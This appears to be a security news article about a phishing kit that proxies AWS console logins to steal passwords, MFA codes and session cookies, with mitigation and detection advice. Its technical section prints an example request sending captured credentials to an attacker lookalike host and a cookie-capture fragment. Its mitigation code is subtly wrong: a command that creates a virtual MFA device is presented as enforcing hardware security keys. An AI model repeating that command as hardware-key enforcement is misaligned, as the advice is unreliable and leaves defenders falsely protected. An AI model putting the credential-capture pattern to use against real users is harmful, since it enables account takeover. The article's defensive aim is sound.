A sophisticated Adversary-in-the-Middle (AiTM) phishing kit targeting AWS Management Console users has been discovered in active campaigns. The kit intercepts authentication sessions in real time, capturing usernames, passwords, and multi-factor authentication (MFA) codes to hijack AWS accounts even when protected by MFA. Attackers deploy proxy servers that sit between victims and legitimate AWS login pages, stealing session cookies and tokens to gain immediate unauthorized access to cloud resources.
Introduction
Multi-factor authentication has long been considered a cornerstone of account security, but a new wave of phishing attacks is demonstrating that MFA alone is no longer sufficient protection. Security researchers have identified an advanced phishing kit specifically engineered to target Amazon Web Services (AWS) console users through Adversary-in-the-Middle techniques.
Unlike traditional phishing that simply harvests credentials, this kit operates as a transparent proxy between victims and AWS’s legitimate authentication infrastructure. By intercepting the entire authentication flow, attackers capture not just passwords but also valid session tokens that bypass MFA protections entirely. With AWS environments often containing sensitive data, production systems, and critical infrastructure, the implications of this attack vector are severe.
Background & Context
Adversary-in-the-Middle phishing represents an evolution beyond conventional credential harvesting. Traditional phishing pages are static replicas that collect usernames and passwords but fail when MFA is enabled. AiTM attacks overcome this limitation by proxying all traffic through attacker-controlled infrastructure in real time.
The technique gained prominence with kits like Evilginx and Modlishka, which demonstrated how session cookies could be stolen to bypass MFA. Threat actors have since commercialized these methods, creating turnkey phishing kits targeting specific platforms. AWS, as the world’s leading cloud provider, presents an attractive target due to the high-value resources typically accessible through compromised accounts.
Previous AiTM campaigns have targeted Microsoft 365 and Google Workspace users with significant success. The adaptation of these techniques specifically for AWS indicates a strategic shift by threat actors toward cloud infrastructure compromise. AWS console access provides attackers with potential control over compute resources, databases, storage buckets, and identity management systems.
Technical Breakdown
The AWS AiTM phishing kit operates through a sophisticated proxy architecture that intercepts and manipulates HTTP/HTTPS traffic:
Initial Compromise Vector
Attacks typically begin with emails impersonating AWS notifications about security alerts, billing issues, or service disruptions. These messages contain links to attacker-controlled domains designed to closely resemble legitimate AWS URLs through techniques like typosquatting or subdomain manipulation.
Proxy Infrastructure
When victims click malicious links, they’re directed to a reverse proxy server that fetches content from the real AWS login page. The kit uses the following process:
Victim → Attacker Proxy Server → Legitimate AWS ConsoleThe proxy server maintains two separate connections—one with the victim and one with AWS—allowing it to relay traffic bidirectionally while capturing sensitive data.
Session Token Extraction
As users complete the authentication flow, the kit captures critical authentication artifacts:
POST /authenticate HTTP/1.1
Host: attacker-controlled-aws-lookalike.com
Content-Type: application/x-www-form-urlencoded
username=victim@company.com&password=SecurePass123&mfaCode=123456
Most critically, the kit extracts session cookies including aws-signin-token and other authentication tokens. These session identifiers are what AWS uses to verify authenticated sessions after successful login.
Real-Time Session Hijacking
Once the victim completes MFA, the attacker immediately captures the session cookie:
document.cookie // Captured by proxy
// Contains: aws-signin-token=The attacker can then import this cookie into their own browser, gaining immediate access to the victim’s AWS console without needing credentials or MFA codes.
Evasion Techniques
Advanced implementations include SSL certificate spoofing using Let’s Encrypt certificates, geographic filtering to avoid security researcher detection, and browser fingerprinting to identify high-value targets.
Impact & Risk Assessment
The consequences of successful AiTM attacks against AWS accounts are potentially catastrophic:
Immediate Risks
- Data Exfiltration: Attackers gain access to S3 buckets, RDS databases, and other storage containing sensitive information
- Resource Hijacking: Compromised accounts can be used to launch compute instances for cryptocurrency mining or botnet operations
- Lateral Movement: AWS credentials often provide pathways to connected services and on-premises infrastructure
- Service Disruption: Attackers may delete resources, modify configurations, or shut down critical services
Financial Impact
Organizations face potential costs from unauthorized resource consumption, data breach notifications, regulatory fines for data exposure, incident response expenses, and business disruption during recovery.
Compliance Implications
Compromised AWS environments containing regulated data (PII, PHI, payment card data) trigger mandatory breach notification requirements under GDPR, HIPAA, PCI-DSS, and other frameworks.
Scope of Exposure
Any organization using AWS with users who access the console through web browsers is potentially vulnerable. The attack is platform-agnostic and works regardless of the victim’s operating system or browser.
Vendor Response
AWS has published security advisories recommending enhanced authentication measures and alerting customers to the phishing campaign. The company’s official stance emphasizes that these attacks exploit user behavior rather than platform vulnerabilities.
AWS has implemented several platform-level protections:
- Enhanced detection for suspicious geographic access patterns
- Machine learning models identifying anomalous console behavior
- Expanded CloudTrail logging to capture authentication anomalies
- Additional warnings for users accessing console from new locations
However, AWS’s primary recommendation remains that customers implement additional security controls beyond basic MFA, particularly hardware-based authentication and conditional access policies.
Mitigations & Workarounds
Organizations can implement multiple defensive layers to protect against AiTM attacks:
Enforce Hardware Security Keys
Require FIDO2/WebAuthn hardware tokens for console access:
# Configure AWS IAM to require hardware MFA
aws iam create-virtual-mfa-device \
--virtual-mfa-device-name HardwareTokenRequired \
--bootstrap-method QRCodePNG \
--outfile QRCode.pngHardware tokens are resistant to AiTM attacks because the cryptographic challenge-response occurs locally and cannot be proxied.
Implement Conditional Access
Restrict console access based on geographic location, IP ranges, and device compliance:
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Deny",
"Action": "*",
"Resource": "*",
"Condition": {
"StringNotEquals": {
"aws:SourceIp": ["203.0.113.0/24"]
}
}
}]
}Deploy Security Awareness Training
Regular phishing simulations help users identify suspicious AWS-themed emails and recognize URL anomalies before entering credentials.
Use AWS IAM Identity Center (SSO)
Centralizing authentication through SSO with federated identity providers adds verification layers and provides better visibility into authentication attempts.
Detection & Monitoring
Early detection of AiTM attacks requires monitoring multiple indicators:
CloudTrail Analysis
Monitor for authentication anomalies:
# Search for console logins from unexpected locations
aws cloudtrail lookup-events \
--lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
--max-results 50Look for patterns like rapid geographic impossibility (logins from distant locations within short timeframes) or unusual user agent strings.
Session Duration Monitoring
AiTM attacks often produce concurrent sessions or unusually long session durations as attackers maintain access.
Failed MFA Attempts
Spikes in failed MFA attempts may indicate attackers testing stolen credentials before launching AiTM proxy attacks.
AWS GuardDuty Alerts
Enable GuardDuty to detect:
- Unusual API call patterns
- Anonymous IP usage
- Impossible travel events
- Credential exfiltration attempts
Best Practices
Organizations should implement comprehensive security measures:
Authentication Hardening
- Mandate hardware security keys for all administrative accounts
- Implement phishing-resistant MFA methods
- Enforce session timeout policies
- Require re-authentication for sensitive operations
Access Management
- Apply principle of least privilege across IAM policies
- Use temporary credentials via AWS STS when possible
- Regularly audit IAM permissions and remove unused access
- Implement break-glass procedures for emergency access
Network Security
- Deploy DNS filtering to block known phishing domains
- Implement TLS inspection where appropriate
- Use VPN or AWS VPC access restrictions for console access
Visibility Enhancement
- Enable CloudTrail across all regions and accounts
- Configure real-time alerting for authentication anomalies
- Implement SIEM integration for centralized monitoring
- Conduct regular access reviews
Key Takeaways
- MFA alone is insufficient protection against modern AiTM phishing attacks that steal session tokens
- AWS console access requires phishing-resistant authentication methods like hardware security keys
- Real-time monitoring of CloudTrail logs is essential for detecting authentication anomalies
- Organizations must implement defense-in-depth strategies combining technical controls and user awareness
- Hardware-based FIDO2 tokens remain the most effective protection against credential interception attacks
References
- AWS Security Blog: Best Practices for MFA
- FIDO Alliance: WebAuthn Implementation Guide
- NIST SP 800-63B: Digital Identity Guidelines
- AWS CloudTrail Documentation
- MITRE ATT&CK: T1557 (Adversary-in-the-Middle)
- AWS IAM Identity Center Configuration Guide
Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/
